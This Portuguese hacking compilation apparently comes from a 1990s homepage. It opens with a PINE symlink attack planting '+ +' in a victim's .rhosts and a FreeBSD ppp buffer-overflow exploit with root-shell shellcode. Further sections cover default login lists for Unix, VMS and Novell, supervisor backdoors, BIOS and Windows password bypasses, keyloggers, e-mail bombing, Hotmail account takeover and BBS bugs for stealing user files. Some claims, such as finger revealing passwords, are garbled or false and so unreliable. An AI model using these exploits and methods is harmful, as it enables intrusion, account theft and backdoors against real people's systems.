simbólico de /tmp/.hamors_lockfile to ~hamors/.rhosts (para um exmplo) causando o PINE a criar ~hamors/.rhostos como um arquivo 666 com o processo PINE isto é como contente. Uma simples coisa para fazer no echo "+ +" > /tmp.hamors_lockfile, then rm /tmp/.hamors_lockfile. Isto foi escrito por Sean B. Hamor. Para este exmplo, hamors é a vítima e catluvr é o "atacante": hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors agora em outro, este é o último que vou mostrar. Scripts Exploits para o vulnerabilidade ppp é descrita por não sei, isto NÃO é uma FreeBSD-SA-96:15.Funciona no FreeBSD, foi testado. Mexa com os números se isso não funcionar. Abaixo, como configurá-lo: #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Agora quevc tem o root pegue o passwd no /etc faz um backdoor no sistema e seje feliz. :P

Hackear PC

Como Hackear um PC Hack PC Password do BIOS Password do Windows Password do screen saver do Windows Proteção de documentos do Word Proteção de arquivos ZIP Proteção de arquivos ARJ Copiando digitações ou macros de um micro Um editor hexadecimal Escondendo informações Bios Password Para quebrar o password do BIOS você pode encontrar duas situações: 1- Se você pegar o computador depois que o password foi passado corretamente, use um desses programas: amipsw.com (230b) ami.com (555b) aw.com (1,83k) amidecod.com (1,79k) 2- Se você pegar o computador desligado ou esquecer o password: - Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou. Password do Windows Para quebrar o password do Windows 3.x você deve digitar "ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou opassword, edite o arquivo win.ini e apague as linhas "load=" e "run=". Para quebrar o password no WIN95: 1 - Se a caixa de verificação que aparecer for Password Logon, simplesmente clique em cancel que o sistema vai entrar. 2 - Se a caixa de verificação for Windows Password, digite"ctrl+alt+del", escolha a janela do password na lista que aparecerá e clique em "End Task". Com o password passado, edite o arquivo win.ini e apague as linhas "load=" e "run=". Screen Saver Password Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password. Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas. Dica enviada por JACKFORCE : Para desligar o screen saver sem ter o password no win 3.1 (ainda não foi testado no 3.11 ou no WIN95), aperte ctrl+alt+del e enter várias vezes que o screen saver é fechado. Proteção de Documentos Word Para retirar a proteção dos documentos do word use esse programa: wfwcd.zip (19,8k) Password do ZIP Para quebrar o password de arquivos ZIP use esse programa: zipcrack.zip (12,3k) Password do ARJ Para quebrar o password de arquivos ARJ use esse programa: brkarj10.zip (13,1k) Copiando Digitações Para copiar teclas digitadas de um micro como passwords ou logins use um desses programas: keycopy.zip - DOS - (3,31k) keytrap.zip - WIN95 - (36,0k) Hexadecimal Para quebrar alguns pogramas, passwords ou códigos de entrada, é bom que você tenha em mãos um bom programa editor de hexadecimal. Ele tamb;em é utilizado para remover os numeros seriais de programas como ACDSee 9.0 e etc... Hex Workshop 32bits (375k) Escondendo Informações Para esconder informações ou até pequenos arquivos em arquivos de imagem do tipo .GIF (Compuserve), use esse programa: Hide and Seek v. 4.1 (82,5k) Hack Modem Encontrando o sistema Sistemas UNIX Sistemas VAX/VMS Sistemas PRIME Rede Novell Passwords muito utilizados E-mail Encontrando o Sistema Para encontrar um computador com o sistema, você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via Telenet ou outro sistema de interligação de computadores. War Dialer: VMB Hacker (40,7k) Sistemas UNIX 1. Entrando no sistema - Para entrar no sistema, você deve entrar com um "login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígitos. Dai você tem três saídas: 1. Arrumar a lista de passwords com um hacker 2. Tentar entrar com os defaults 3. Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde. Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo. Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo 2. Dentro do sistema: Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords. Ele se está em: /etc/passwd. Nesse arquivo, você vai encontrar as informações na seguinte sintaxe: username:password:UserID:GroupID:descrição ou nome:homedir:shell Ex.: fou:234abc56:7148:34:Fausto Morais:/home/dir/fou:/bin/fou Username: fou Encrypted Password: 234abc56 User Number: 7148 Group Number: 34 Other Information: Fausto Morais Home Directory: /home/dir/fou Shell: /bin/fou Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras igusia com a mesma decriptação) ele para e dá a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k) Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema. Ex.: fou::7148:34:Fausto Morais:/home/dir/fou:/bin/fou Depois da lista de passwords, pegue os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também encriptados. sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin. /usr/mail/ - É onde estão guardadas as mensagens de cada usuário. Sistema VAX/VMS Para entrar no sistema VAX/VMS, você deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguém ou tente os defaults. Username: Password: system operator system manager system system system syslib operator operator systets uetp systest systest systest test sysmaint sysmaint sysmaint service sysmaint digital field field field service guest guest guest sem password demo demo demo sem password test test decnet decnet Dentro do sistema não há muito o que fazer. Você pode tentar pegar a lista de passwords em: SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não está disponível para os usuários Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte... Sistema PRIME Para entrar no sistema PRIME você deverá fazer as mesmas coisas que fez no UNIX e no VAX's. Username: Password: prime prime primos primos primos prime primos_cs prime primos_cs primos primenet primenet system system system prime system primos netlink netlink test test guest guest guest1 guest Rede Novell 1. Entrando no Sistema - Para quebrar a rede Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estão alguns defaults: Login: superisor guest admin user_template print laser hp_laser printer laserwriter post mail gateway gate router backup wangtek fax faxuser faxworks test archivist chey_archsvr windows_passthru Se você conseguir entrar com esses defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários. 2. Conseguindo Supe Acess - Para conseguir um acesso Supervisor, que é muito importante para fazer uma backdoor ou utilizar outros recursos use esse programa: nw-hack.zip (25,8k) Os problemas de usar o nw-hack são os seguintes: O password Supervisor é mudado para SUPER_HACKER; Todas as contas no servidor tem acesso Supervisor; o administrador do sistema logo saberá que você entrou na rede e acabará com os previlégios do acesso Supervisor mudando também seu password. A única coisa que você pode fazer é deixar uma backdoor ou "porta dos fundos". 3. Deixando uma Porta dos Fundos - Uma porta dos fundos com previlégios de acesso Supervisor é como uma assinatura grátis. Para fazer isso, você deve utilizar o seguinte programa: super.zip (31,3k) Esse programa foi escrito exatamente para deixar o usuário desligar e ligar o acesso Supervisor na hora que quiser. Faça então o seguinte: Consiga aceso Supervisor com o nw-hacker; Ligue sua conta para supe equivalency com o super.exe; Se você ganhar acesso Supervisor, dê supe equivalency a algum dos defaults (Guest, test, archivist, chey_archsvr...); Saia e entre na rede com o default que você deu a supe equivalency e ligue o acesso Supervisor com o super.exe; Saia e entre novamente com o login que você utilizou primeiro; Remova o acesso Supervisor. Agora o default que você escolheu pode ser ligado e desligado por você, na hora que você quiser para ter acesso Supervisor. Passwords Se não houver outro jeito e você precisar chutar os passwords, chute com inteligência e não vá começando: aaa, aab, aac, aad ... Os passwords mais utilizados aqui no Brasil são: Times de futebol; Telefone; Sobrenome; Nome de computadores (pentium, ibm, etc são encontrados com frequência); Apelidos; Nome de pessoas famosas; Passwords de teclas seguidas. Ex.: qwerty, asdfgh, zxcvbn ou aaa, bbb, ccc. O usuário que usa desse tipo de password não pensaem hackers quebrando sua senha e sim na velocidade para dar login. Por isso, quando você escolher seu password, faça uma mesclagem de letras e números. Ex. mouse/1997 - m1o9u9s7e. Parece óbvio, mas ninguém vai chutar um password desse tipo quando tentar quebrar seu login. E-mail Nesta sessão você encontrará arquivos para enviar e-mails bombs, e-mail sem remetente e os famosos PGPs. Unabomb (59,9k) Para bombear o e-mail de alguém. Upyours 3.0 (+-2Mb) Link para o melhor programa de e-mail bomb Anonimail (71,3k) Para enviar e-mails anônimos AEgis Shell for PGP (2,6Mb) Link para um dos melhores programas de encriptação Se você quiser enviar um E-Mail para Usenet, mande a mensagem para @, por exemplo. Grupo: fou.morais Gateway: news.demon.co.uk Endereço: fou.morais@news.demon.co.uk Abaixo está uma lista com alguns gateways: group.name@news.demon.co.uk group.name@charm.magnus.acs.ohio-state.edu group.name@undergrad.math.uwaterloo.ca group.name@nic.funet.fi group.name.usenet@decwrl.dec.com Para escrever essa sessão, foram tomados como base os seguintes documentos: The PC Hacking FAQ Por: Olcay Cirit BASIC NETWORKING Por: Sk8 The SkinHead alt.2600 FAQ, Beta 013 Por: Vários Autores

Hackeando Sites!

HACKEANDO SITES DERRUBAÇÃO E INVASÃO: Para que este truque funcione vc precisa entender um pouco sobre Exploits (principalmente na área de pigns e nukes). Para que vc consiga hackear um site, deve primeiro tentar pinga-lo ou derrubalo. Isto não é fácil partindo do ponto que para derruba rum servidor seu modem precisa ser mais forte do que o dele. Se vc conseguir derrubar o site desejado, após derrubar tente hackear o site. OBS: A pessoa que escreveu este texto acima, nunca deve ter ouvido falar em NT LAG. Nt Lag é um tipo de ataque D.O.S que permite você derrubar um servidor NT. Muitas HPs de sites como a do meu colégio por exemplo (que eu mesmo já hackeei, óbvio que eu não fui burro de mexer em nada) são controladas via NT, ou seja, eu poderia fazer o método acima, e antes eu derrubaria por NT Lag (porém não usei este método de derrubar e invadir) LOCALIZAR/COMPUTADOR: Este é um método que se feito direito poderar dar certo. Antes verifique se você fez aquele negócio de renomear o arquivo vnbt.386 para vnbt.bak do c:\windows\system, que impede você de ser nukado. Caso você tenha feito isto, volte o arquivo vnbt.bak para vnbt.386. Este truque p/ renomeação nem é grande coisa. Eu prefiro invadir sites, do que ter uma prteçãozinha para nuke barata. Agora você irá precisar de um Adaptador para a rede dial Up do windows versão 2.0. Eu não sei onde encontra-lo, caso você ache ou sabe onde encontra-lo me avise por favor. Eu tinha ele só que perdi. Agora em diante siga todos os passos daquele texto sobre invasão por ip lançado na net. Você só não precisa ligar o compartilhamento de arquivos e impressoras, por que o que aquela fez ao escrever isso, é que todos tivessem o compartilhamento ligado e ficasse a maior zona p/ q todos zoassem. Depois que você fez tudo aquilo que tava naquele texto, vá no INICIAR/LOCALIZAR/COMPUTADOR e coloque o ip da sua vítima lá. Vo lembrar a você que só conseguirá invadir sites que são controlados por Windows NT, e que se ele for controlado por qualquer outro sistema você irá precisar da senha para logar. A senha você poderá conseguir dando um finger. FINGER: Muitos sites deixam aberto a porta de finger. Finger é uma porta que possui os dados dos ultimos logs no servidor. Pegue o ip do site, e um programa de finger. Depois disso abra o programa de finger e coloque o usuário da qual você quer o ultimo log seguido do ip por exemplo root@200.210.255.13. Vai aparecer o login e a senha. Agora abra o telnet e conecte no servidor pela porta 80. Entre com o login e a senha que o finger te deu. Pronto você entrou. OBS: Isso só da certo se o server tiver o finger abilitado.

Hackeando Lantastic

HACKEANDO LANTASTIC Como já sabemos a Lantastic 6.0 é considerada a melhor rede ponto-a-ponto do mercado, mas descobri um erro banal, onde você pode ter acesso aonet_mgr que é o programa onde se tem controle total de usuários e restrições. Ai vai, Localize dentro do diretório LANTASTI.NET o subdir SYSTEM.NET, dentro deste subdir você encontrara o arquivo com nome Zcontrol. Agora é só renomear este arquivo e pronto, você tirou a senha do net_mgr da Lantastic 6.0. Build Your Free Home PageVisit other great pages on:Arts & Literature>Arts & LiteraturePerforming Arts>Performing ArtsTheaterTheater

Hackeando a HOTMAIL!

HACKEANDO HOTMAIL Este texto foi escrito em inglês (original) por SnEzE. A versão traduzida para o português foi efetuada por Crypt. 980123 2.44 PM Guia para Hackear a Hotmail por SnEzE V.2.0 Existem várias maneiras par se hackear a Hotmail, mais aqui só coloquei as melhores. Se esses truques não funcionarem prof avor envie um email para christog@hem1.passagen.se (OBS: esse cara é americano manda o mail para ele em inglês tá) e eu lhe direi o que vc esta fazendo de errado ou se a hotmail mudou alguma coisa. Lembre-se de que essas informações são apenas para uso educacional e vc não pode culpar ninguém pelo problema causado por inglês. Apenas lembre-se de que ninguém gosta que os outros fiquem vendo sua account, ele ou ela podera ficar muito brabo... Aqui estão os meus métodos favoritos ____ I_1_I - Hackeando a força bruta a. Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail) b. Digite USER e o username da vitíma c. Digite PASS e tente um password d. Repita isso até que vc tenha achado a password correta !. Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida. ____ I_2_I - O melhor método a. Consiga o username da vitíma ( Geralmente fica no campo de endereço ) b. Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma " c. Vc entrou !. Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out ____ I_3_I - O método velho a. Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma) b. Dê um Log Out c. Agora digite o username da vitíma d. Olhe a origem do arquivo e. Olhe a linha 50 vc devera encontrar "action=someadress" d. Copie o endereço e coloque no campo de e. Vc esta dentro !. Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out ____ I_4_I - Outro método... a. Vá a Home Page da Hotmail b. Copie a origem do arquivo c. Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter d. "Veja" a página e. No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter) f. Peça para vítima digitar sua senha e seu username g. Olhe o campo do endereço. Vc deverá ver ...&password:something... !. Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm. Boa sorte! LEIA! Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo Este texto veio de http://hem1.passagen.se/christog/hotmail.htm lembre-se que esta é a versão V.2.0.. Mais ira chegar...

Hacking BBS

ACKEANDO BBS BBS INESCRUPULOSAS (Axur05 nº1) ~~~ ~~~~~~~~~~~~~~ Voce deve conhecer pelo menos um ou dois BBS de grande porte que cobram muito caro e nao oferecem um servico esperado. Nessas BBSs , o operador nao quer nada mais alem do que o seu di- nheiro ou seu lindo numero de cartao de credito... Voce e' feio ou bonito? Inteligente ou uma anta? Nao interessa, para eles o que interessa e' seu dinheiro. Exemplo: Voce acessa pela primeira vez uma dessas , e o que voce pode acessar? NADA! So' pode mandar msgs para o SysOp, e nem adianta esperar reply, porque para ele voce e' um im- becil. Chama-lo para chat? Nem adianta. Ele nem ouve o sinal... Mas e' so' pagar, depositando uma grana na conta do BBS ou fornecendo o numero do seu credicard que o tra- tamento muda totalmente. Areas e mais areas de arquivos, o SysOp atende toda vez que vc chama e coisa e tal. Acabou o mes? Ok, voce se tornou de novo um imbecil. Isso precisa acabar! Precisamos dar um pe' no traseiro desses idi- otas donos ou sysops de BBS. E o acesso gratis `a internet entao? Aquelas lojas em que voce compra um computador e recebe horas gratis na internet atraves de um BBS. Tudo bem, voce mora no interior e o BBS e' na capital , mas voce ja esta' empolgado mesmo. Ligando no servico de atendimento do BBS, voce constata que, alem de ter de fazer a ligacao interurbana, ain- da precisa assinar o BBS e comprar o soft de navegacao (que o BBS vende) Resultado: alem de morrer na grana do interurbano e no aces- so ao BBS, voce ainda gasta 50 pau para comprar a merda do browser! [ Moral da historia:Voce e' um dos muitos que sao explorados por esses BBS's e nao agem de forma alguma pra que este qua- dro do CyberSpace mude!!! Estamos precisando de mais acao! ] BBZs DIRIGIDAS POR LAMAH'S Voce tambem ja deve ter acessado em alguns desses.O ZyZop, geral- mente uma crianca que nem sabe da vida , alem de ter um sistema po- dre, faz gracinhas com voce, se dizendo o hacker. Conheci um espe- cime desses, que rodava uma board em PCBoard e nem sabia o que era um PPE! O que aconteceu, adivinha?Foi deletado!!!Ri muito!!!Um cara entrou num backdoor e fudeu tudo. Esses ZyZoP'z sao , em maioria , mauricinhos filhos da puta e mima- dinhos que tem um Pentium 166 e provavelmente compraram o BBZ de um cara esperto , que deve ter vendido muito caro. Em muitos dos casos, o cara que deleta o bbz e' o mesmo que o ven- deu para o lamer. CONSIDERACOES FINAIS Amigos do mundo underground , uni-vos! Precisamos acabar com lixos como esses. ALGUNS BUG'S PRA TE DEIXAR MAIS "ESPERTO" CONTRA TAIS EXPLORACOES! # SyZTeM > PCBoard 15.x # -: Caso vc seja um novo usuario, ou seja, teu nivel de acesso nao permita fazer praticamente nada, execute tal bug para que voce possa pegar file que esteja nos dir.'s da bbs : l - (filenanme) - (areaname) d - ns [ENTER] Pronto... o file ja esta marcado, basta agora fazer o download! -: Para conseguir maior tempo de acesso : Entre na area livre da bbs, marque qualquer file e faca o download. Pule pro seu OS, e entre no dir. onde se localiza o file, logo apos vc devera usar um porgraminha, cujo nome e' hexed.exe, onde ira edi- tar tal file (nao importa se esteja compactado) e tira somente 1 bt Volta novamente pro teu programa de comunicacao e puxe novemente o mesmo file pelo protocol ZMODEM. Agora... volte pro main mnu da bendita bbs, e da uma olhadinha no teu tempo de acesso! :) # SyZTeM > PCBoard & RA (aLL VeRSioN) -: Para conseguir roubar qualquer file do HD do SySoP , inclusive o users.dat da bbs! Basta ter um programa de comunicacao com o protocol BiMODEM e o sis- tema HOST tambem. Mas caso teu programa nao tiver tal protocol, bas- ta instalar um... nao e' dificil de achar! Well... vc esta conectado na bbs, agora, faca o upload de qualquer file. Durante a transferencia (por protocol BiMODEM) vc tera a opcao de fazer o download...e pronto! Puxe o users.dat do HD HOST, mas an- tes, vc tera que descobrir em que dir. se encontra tal file! :) MAs isto e facil.. puxe o autoexec.bat dele, e verifique qual o board que ele esta carregando, e em que path esta localizado, consequente- mente, vc sabera onde esta o users.dat! NOTA: este bug's sao basicos, mas vc tera um bao progresso com eles! :) =+=---------------- kS_5 1997(c) Global Domination Inc. CODIGOS EMSi (Axur05 nº1) ~~~~~~~ ~~~~ Numa bela madrugada... quando estava acessando uma bela BbS, o qual nao irei divulgar o nome, descobri que alguns gerenciadores usam codigos IEMSi para exercer algumas tarefas com o REMOTO. Mas como, felizmente, estava usando um programa de comunicacao que nao aceitava tais codigos, foi possivel eu tirar uma lista quase que detalhada de todos os codigos usados por tais bbs's!!! [ Logo quando apareceu a primeira tela de apresentacao... onde deve colocar o login e tudo mais pra acessa-la, apareceu o seguinte EMSi: IRQ8E08. Achei bastante estranho nao vir com alguma funcao, mas foi ai que tudo comecou... :)) ] =+=--------------- [ LiSTaGeM DoS EMSi'S ] **EMSI_IRQ8E08 : Envia Dados (Nome, Senha, Tel, Etc) **EMSI_IIR61E2 : Desativa o Envio de Dados **EMSI_ICI00C3 : Cabecalho dos dados a enviar **EMSI_CHTF5D4 : Chat **EMSI_TCH3C60 : Chat Off **EMSI_ACKA490 : CRC ERROR - Reenvie Dados **EMSI_NAKEEC3 : CRC ERROR - Desconheco **EMSI_REQA77E : Desconheco **EMSI_IN9C816 : Desconheco =+=--------------- [ FuNCoeS eXeRCiDaS ] Estas sequencias sao enviadas normalmente por um programa de comunicacao quando recebe o **EMSI_IRQ8E08 **EMSI_ICI00C3{Nome do Usuario}{}{Cidade \2F Estado \2F Pais}{telefone}{} {SENHA}{N§ Do registro}{Terminal,24,80,0}{ZAP,ZMO,KER}{CHT,TAB,ASCII8} {HOT,MORE,FSED,NEWS,MAIL,CLR}{Nome do Programa,Versao ,Nome da pessoa registrada}{}1CB4EEC8 1 -: **EMSI_IRQ8E08 **EMSI_IIR61E2 Se voce enviar o **EMSI_IRQ8E08, vc recebera os dados, e se voce Digitar logo apos **EMSI_IIR6E2 vc fara com que o usuario nao perceba o que aconteceu. 2 -: **EMSI_CHTF5D4 **EMSI_TCH3C60 Servem para entrar no chat e sair dele, mas tambem Podem ser usa- dos para desconectar uma pessoa por insistencia, tipo colocar um CHTF5D4 ou melhor um IRQ8E08 em uma mensagem e ele nao conseguira sair da tela do chat (se for um usuario inexperiente). 3 -: **EMSI_ACKA490 Apenas o que eu sei sobre este comando, e' para reenviar dados, tipo se vc dar um IR8E08 e logo depois um ACKA490 ele re-enviara a tela com os dados. 4 -: **EMSI_NAKEEC3 Aparece quando houve um erro de crc no EMSI. =+=--------------- [ oBSeRVaCoeS FiNaiS ] # Quem quiser se livrar dos IR8E08 basta desativar o emsi no programa de comunicacao que esta usando. # Tais comandos EMSi so funciona se o usuario estiver usando um prograna de comunicacao onde se aceita EMSi (LOGICO!!! :)) ) # Os comandos que nao foram incluidos nesta lista foi pq ficaram como des- conhecidos, ou seja, nao consegui descobrir! :) =+=--------------- kS_5 1997(c) Global Domination Inc. -=[#]=- 7.HaCkeando PCBoard -=[#]=- ===================== (Quebra de Sigilo nº1) .:( Atencao .: Grande parte deste texto foi estraido de um texto feito por Andre Saes, e nada foi modifico.):. 1. Introdu‡„o îîîîîîîîîîîîî Antes de iniciar este documento, gostaria de falar um pouco sobre seu desenvolvimento bem como de termos que ser„o usados neste texto, juntamente com sua explica‡„o, tais como Free Download, Batch, etc ... A 3 anos atras, comecei a usar o gerenciador de BBS PCBoard, optei por ele pois ao meu modo de ver ‚ o melhor, o mais seguro e o mais confi vel. No entanto, com o passar do tempo, usando e explorando suas atividades, comecei a encontrar alguns problemas, chamados BUGS, no seu m¢dulo principal. Desta forma, passei a consultar diversas pessoas, dos mais diferentes BBS bem como sua area de atua‡„o, e o que encontrei? A maior parte fantasiava, dizia que o David Terry (programador) teria escondido macros (c¢digos @) dentro do PCBoard onde vocˆ poderia obter o n¡vel de Sysop, outros diziam em fazer backdoors, mais no fundo, nada ‚ l¢gico. Com o meu conhecimento de PCBoard, comecei a pesquisar sua estrutura, tanto em testes em rela‡„o ao meu sistema bem como em outros sistemas. Desta forma sim, encontrei defeitos, usando os mesmos, fui desvendando um enorme potˆncial neste sistema, ou seja, os problemas est„o meio que relacionados. Fiz este texto, pois achei que ja estava no exato momento dos Sysops tomarem este conhecimento, e ao contr rio do que muitos podem dizer, n„o sou ningu‚m metido a hacker e muito menos procuro publicidade com isto. De outro lado, desejo que este texto chegue nas m„os do programador David Terry, pois assim tenho certeza de que, ele far o poss¡vel para corrigir estes problemas. Antes que me esque‡a, falarei agora um pouco sobre estes termos que ser„o de extrema necessidade na leitura deste texto, segue abaixo: ú Free download: FLAG (marca) para o arquivo, de tal forma que este n„o ser contado pelo sistema, em rela‡„o a bytes e tempo (min.) ú Batch: Estrutura de arquivos do PCBoard, a qual armazna a lista dos arquivos que ser„o retirados posteriormente pelo usu rio, acessivel via comando FLAG, ou algum seguido de D (sufixo para download) Ap¢s concluida a leitura deste texto, aguardo seu feedback. EMAIL: andre@tecepe.com.br ou asaes@tecepe.com.br 2. Rela‡„o dos bugs e r pidas explica‡"es îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Nesta parte, pretendo relatar apenas os bugs e o que ‚ capaz de se fazer com os mesmos, segue abaixo: ú Bug em arquivos free download Com este bug ‚ poss¡vel vocˆ conseguir mais tempo e bytea atrav‚s de uma sequˆncia de repeti‡„o/cancelamento da transferˆncia. ú Bug no sistema Batch do PCBoard Com este bug ‚ poss¡vel vocˆ fazer downloads de quantos arquivos vocˆ desejar, independentemente de tempo e bytes ú Bug em linhas de parametros Em algumas linhas, tais como download ou upload (especifica‡„o de arquivos) vocˆ poder usar macros que somente Sysops teriam acesso. 3. Bug em arquivos free download îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Para muitos Sysops ‚ interessante deixar alguns arquivos free download tais como allfiles, manuais, etc .. S¢ que estes, por sua vez, n„o pensam em que estes simples arquivinhos poderiam contribuir, e muito em rela‡„o a tempo para o usu rio. Procedimentos: ú Fa‡a o download de algum arquivo que seja free download, tal como a lista de todos arquivos (allfiles), pois este na maioria dos BBS encontra-se como free download ú Use o Norton Disk Editor, ou qualquer programa que altere o numero de bytes, e retire apenas 10 bytes, por exemplo (um pequeno peda‡o) ú Em seguida, retorne ao BBS e marque novamente este arquivo para download e o fa‡a, com isto, o crash recovery do arquivo ser ativado, ou seja a transferˆncia tomar o rumo de onde parou. ú Ap¢s a transferencia, verifica-se que seu tempo pelo menos ficou 10x maior, isto explica-se pois o PCBoard n„o soube cotar quanto tempo demorou o arquivo realmente, e multiplica o tempo do usu rio por um valor negativo. Veja o exemplo abaixo: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ O usu rio tinha dispon¡vel apenas 30 minutos, ap¢s o crash ³ ³ recovery este tempo foi multiplicado por 0.1, ou seja, o tempo ³ ³ do usu rio ficou em m‚dia 10x maior. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Corre‡„o (somente para os Sysops) ú A princ¡pio, a unica corre‡„o ‚ aguardar a solu‡„o vinda da Salt Air Por‚m, vocˆ pode criar um PPE substitutivo tanto para a linha de comandos, que verifica tempo anterior n„o pode ser maior que o atual, ou ent„o na linha em que o sistema informa o numero de CPS obtidos, e faz a devida subtra‡„o do tempo inicial pelo valor real da transferˆncia. ú Vocˆ pode encontrar os PPEs no meu BBS, PCI BBS, por‚m, como o BUG n„o fui eu quem criei, cobrarei por este conjunto de solu‡"es. Visite-nos para obter mais informa‡"es. 